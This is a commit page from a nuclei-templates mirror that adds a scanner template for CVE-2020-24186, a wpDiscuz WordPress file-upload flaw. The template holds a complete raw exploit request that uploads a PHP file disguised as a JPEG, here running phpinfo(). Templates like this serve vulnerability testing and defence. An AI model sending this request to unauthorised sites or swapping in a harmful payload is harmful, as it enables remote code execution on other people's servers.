daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2020-24186.yaml

patch-1
Ganesh Bagaria 2021-02-28 12:53:43 +05:30 committed by GitHub
parent 6db49fa74e
commit 5d61184601
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 54 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

54
cves/2020/CVE-2020-24186.yaml Normal file
View File

@ -0,0 +1,54 @@
id: CVE-2020-24186
info:
name: Unauthenticated arbitrary file upload wpDiscuz WordPress plugin
author: Ganofins
severity: high
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable sites server.
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
tags: cve,cve2020,wordpress,wp-plugin
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 774
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie:
Connection: close
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="action"
wmuUploadFiles
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmu_nonce"
aede3ab0b2
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmuAttachmentsData"
undefined
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="wmu_files[0]"; filename="hello.php"
Content-Type: image/jpeg
ÿØÿájExifMM*<2A><><EFBFBD>i<EFBFBD><69>><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>¨<EFBFBD><C2A8><EFBFBD><EFBFBD>À<EFBFBD><C380><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ÿà<C3BF>JFIF<49><46><EFBFBD><EFBFBD>ÿÛC<C39B><43><EFBFBD>
<EFBFBD><EFBFBD>
<?php phpinfo();?>
------WebKitFormBoundaryUGWBOKSwsalnzhha
Content-Disposition: form-data; name="postId"
393
------WebKitFormBoundaryUGWBOKSwsalnzhha--
matchers:
- type: status
status:
- 200